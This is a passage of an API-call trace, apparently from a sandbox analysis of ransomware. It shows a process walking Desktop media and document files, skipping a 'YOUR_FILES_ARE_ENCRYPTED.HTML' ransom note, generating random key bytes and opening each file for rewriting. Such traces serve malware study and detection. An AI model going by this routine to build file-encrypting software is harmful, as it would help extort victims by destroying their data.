PathFindExtensionW (pszPath="l-iuN1.bmp") returned=".bmp" [0166.156] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cdeac90, ftCreationTime.dwHighDateTime=0x1d7dc65, ftLastAccessTime.dwLowDateTime=0xe5921fd0, ftLastAccessTime.dwHighDateTime=0x1d7e3df, ftLastWriteTime.dwLowDateTime=0xe5921fd0, ftLastWriteTime.dwHighDateTime=0x1d7e3df, nFileSizeHigh=0x0, nFileSizeLow=0xb931, dwReserved0=0x0, dwReserved1=0x60, cFileName="MKov.avi", cAlternateFileName="")) returned 1 [0166.156] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\MKov.avi") returned 40 [0166.156] lstrcmpW (lpString1="MKov.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.156] PathFindExtensionW (pszPath="MKov.avi") returned=".avi" [0166.157] lstrlenW (lpString=".avi") returned 4 [0166.157] PathFindExtensionW (pszPath="MKov.avi") returned=".avi" 
[0166.157] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\MKov.avi" (normalized: "c:\\users\\5alr3u30d3\\desktop\\mkov.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.157] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=47409) returned 1 [0166.157] GetProcessHeap () returned 0x270000 [0166.157] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.158] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="E1") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="BF") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="2A") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="90") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="8D") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="B8") returned 2 [0166.158] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="D2") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="21") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="A6") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="CD") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="B8") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="CC") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="24") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6A") returned 2 [0166.159] wsprintfW (in: 
param_1=0x4ebdd7a, param_2="%02X" | out: param_1="1D") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="D4") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="8E") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="C8") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="92") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="31") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="01") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="F6") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="32") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="29") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="1A") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="3E") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="D3") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="90") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="06") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="A8") returned 2 [0166.159] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="72") returned 2 [0166.160] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="17") returned 2 [0166.160] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\MKov.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\MKov.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\MKov.avi" [0166.160] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, 
NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.160] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.173] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8acf57a0, ftCreationTime.dwHighDateTime=0x1d7ddf1, ftLastAccessTime.dwLowDateTime=0x55908060, ftLastAccessTime.dwHighDateTime=0x1d7e629, ftLastWriteTime.dwLowDateTime=0x55908060, ftLastWriteTime.dwHighDateTime=0x1d7e629, nFileSizeHigh=0x0, nFileSizeLow=0x5bfa, dwReserved0=0x0, dwReserved1=0x60, cFileName="NMRn3Fz86tX17DjR6.jpg", cAlternateFileName="NMRN3F~1.JPG")) returned 1 [0166.173] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg") returned 53 [0166.173] lstrcmpW (lpString1="NMRn3Fz86tX17DjR6.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.173] PathFindExtensionW (pszPath="NMRn3Fz86tX17DjR6.jpg") returned=".jpg" [0166.173] lstrlenW (lpString=".jpg") returned 4 [0166.173] PathFindExtensionW (pszPath="NMRn3Fz86tX17DjR6.jpg") returned=".jpg" [0166.173] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\nmrn3fz86tx17djr6.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.174] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=23546) returned 1 [0166.174] GetProcessHeap () returned 0x270000 [0166.174] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.175] wsprintfW (in: param_1=0x4ebdd42, 
param_2="%02X" | out: param_1="D9") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="FF") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="3D") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="BB") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="B5") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="DE") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="B0") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="B2") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="C1") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="1A") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="14") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="1E") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="31") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="42") returned 2 [0166.175] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="81") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="02") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="0D") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="99") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="8B") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="FD") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="47") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="87") returned 2 [0166.176] wsprintfW 
(in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="F8") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="7C") returned 2 [0166.176] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="7A") returned 2 [0166.177] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg" [0166.177] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.177] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.192] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37183ae0, ftCreationTime.dwHighDateTime=0x1d7dfd2, ftLastAccessTime.dwLowDateTime=0x7a3567c0, ftLastAccessTime.dwHighDateTime=0x1d7e01e, ftLastWriteTime.dwLowDateTime=0x7a3567c0, ftLastWriteTime.dwHighDateTime=0x1d7e01e, nFileSizeHigh=0x0, nFileSizeLow=0xfd3b, dwReserved0=0x0, dwReserved1=0x60, cFileName="nP4M5QM-M9H.pdf", cAlternateFileName="NP4M5Q~1.PDF")) returned 1 [0166.192] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf") returned 47 [0166.192] lstrcmpW (lpString1="nP4M5QM-M9H.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.192] PathFindExtensionW (pszPath="nP4M5QM-M9H.pdf") returned=".pdf" [0166.192] lstrlenW (lpString=".pdf") returned 4 [0166.192] PathFindExtensionW (pszPath="nP4M5QM-M9H.pdf") returned=".pdf" [0166.192] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.192] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf" (normalized: "c:\\users\\5alr3u30d3\\desktop\\np4m5qm-m9h.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.194] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=64827) returned 1 [0166.194] GetProcessHeap () returned 0x270000 [0166.194] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.195] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf" [0166.195] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.195] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.206] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6b0ae0, ftCreationTime.dwHighDateTime=0x1d7df8e, ftLastAccessTime.dwLowDateTime=0x41295620, ftLastAccessTime.dwHighDateTime=0x1d7e0a6, ftLastWriteTime.dwLowDateTime=0x41295620, ftLastWriteTime.dwHighDateTime=0x1d7e0a6, nFileSizeHigh=0x0, nFileSizeLow=0xeed8, dwReserved0=0x0, dwReserved1=0x60, cFileName="PfB5zoxaJHleqV31.flv", cAlternateFileName="PFB5ZO~1.FLV")) returned 1 [0166.206] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv") returned 52 [0166.206] lstrcmpW (lpString1="PfB5zoxaJHleqV31.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.206] PathFindExtensionW (pszPath="PfB5zoxaJHleqV31.flv") 
returned=".flv" [0166.206] lstrlenW (lpString=".flv") returned 4 [0166.207] PathFindExtensionW (pszPath="PfB5zoxaJHleqV31.flv") returned=".flv" [0166.207] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv" (normalized: "c:\\users\\5alr3u30d3\\desktop\\pfb5zoxajhleqv31.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.207] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=61144) returned 1 [0166.207] GetProcessHeap () returned 0x270000 [0166.207] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.208] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv" [0166.208] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.208] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.212] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cba400, ftCreationTime.dwHighDateTime=0x1d7e4a0, ftLastAccessTime.dwLowDateTime=0x40c8f830, ftLastAccessTime.dwHighDateTime=0x1d7e53c, ftLastWriteTime.dwLowDateTime=0x40c8f830, ftLastWriteTime.dwHighDateTime=0x1d7e53c, nFileSizeHigh=0x0, nFileSizeLow=0x19a4, dwReserved0=0x0, dwReserved1=0x60, cFileName="rJo4UNhUAI_.png", cAlternateFileName="RJO4UN~1.PNG")) returned 1 [0166.213] wnsprintfW (in: 
pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png") returned 47 [0166.213] lstrcmpW (lpString1="rJo4UNhUAI_.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.213] PathFindExtensionW (pszPath="rJo4UNhUAI_.png") returned=".png" [0166.213] lstrlenW (lpString=".png") returned 4 [0166.213] PathFindExtensionW (pszPath="rJo4UNhUAI_.png") returned=".png" [0166.213] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png" (normalized: "c:\\users\\5alr3u30d3\\desktop\\rjo4unhuai_.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.217] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=6564) returned 1 [0166.218] GetProcessHeap () returned 0x270000 [0166.218] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.219] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png" [0166.219] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.219] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.226] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefed9ed0, ftCreationTime.dwHighDateTime=0x1d7e4e5, ftLastAccessTime.dwLowDateTime=0xa759b4f0, ftLastAccessTime.dwHighDateTime=0x1d7e4fa, 
ftLastWriteTime.dwLowDateTime=0xa759b4f0, ftLastWriteTime.dwHighDateTime=0x1d7e4fa, nFileSizeHigh=0x0, nFileSizeLow=0x108c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="SAhcL1 Hws.mp4", cAlternateFileName="SAHCL1~1.MP4")) returned 1 [0166.226] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4") returned 47 [0166.226] lstrcmpW (lpString1="SAhcL1 Hws.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.226] PathFindExtensionW (pszPath="SAhcL1 Hws.mp4") returned=".mp4" [0166.226] lstrlenW (lpString=".mp4") returned 4 [0166.226] PathFindExtensionW (pszPath="SAhcL1 Hws.mp4") returned=".mp4" [0166.226] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4" (normalized: "c:\\users\\5alr3u30d3\\desktop\\sahcl1 hws.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.227] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=67777) returned 1 [0166.227] GetProcessHeap () returned 0x270000 [0166.227] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.228] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4" [0166.228] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.228] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.235] FindNextFileW (in: 
hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a6d100, ftCreationTime.dwHighDateTime=0x1d7db37, ftLastAccessTime.dwLowDateTime=0x2e122ff0, ftLastAccessTime.dwHighDateTime=0x1d7e6b2, ftLastWriteTime.dwLowDateTime=0x2e122ff0, ftLastWriteTime.dwHighDateTime=0x1d7e6b2, nFileSizeHigh=0x0, nFileSizeLow=0xbdf6, dwReserved0=0x0, dwReserved1=0x60, cFileName="sBE7Aem.wav", cAlternateFileName="")) returned 1 [0166.236] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav") returned 43 [0166.236] lstrcmpW (lpString1="sBE7Aem.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.236] PathFindExtensionW (pszPath="sBE7Aem.wav") returned=".wav" [0166.236] lstrlenW (lpString=".wav") returned 4 [0166.236] PathFindExtensionW (pszPath="sBE7Aem.wav") returned=".wav" [0166.236] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav" (normalized: "c:\\users\\5alr3u30d3\\desktop\\sbe7aem.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.236] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=48630) returned 1 [0166.236] GetProcessHeap () returned 0x270000 [0166.236] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.237] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="60") returned 2 [0166.237] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="24") returned 2 [0166.237] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="B4") returned 2 [0166.237] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="AA") returned 2 
[0166.237] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="DA") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="2D") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="7F") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="FE") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="A0") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="66") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="99") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="93") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="A8") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="92") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="9A") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="EA") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="D4") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="77") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="AA") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="C8") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="64") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="97") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="4B") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="02") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="64") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: 
param_1="9F") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="2F") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="7C") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="97") returned 2 [0166.238] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="63") returned 2 [0166.239] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="5F") returned 2 [0166.239] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="47") returned 2 [0166.239] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav" [0166.239] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.239] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49a7500, ftCreationTime.dwHighDateTime=0x1d7d73e, ftLastAccessTime.dwLowDateTime=0x178844f0, ftLastAccessTime.dwHighDateTime=0x1d7da59, ftLastWriteTime.dwLowDateTime=0x178844f0, ftLastWriteTime.dwHighDateTime=0x1d7da59, nFileSizeHigh=0x0, nFileSizeLow=0x104f9, dwReserved0=0x0, dwReserved1=0x60, cFileName="SDwqK.bmp", cAlternateFileName="")) returned 1 [0166.250] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SDwqK.bmp") returned 41 [0166.250] lstrcmpW (lpString1="SDwqK.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.250] PathFindExtensionW (pszPath="SDwqK.bmp") 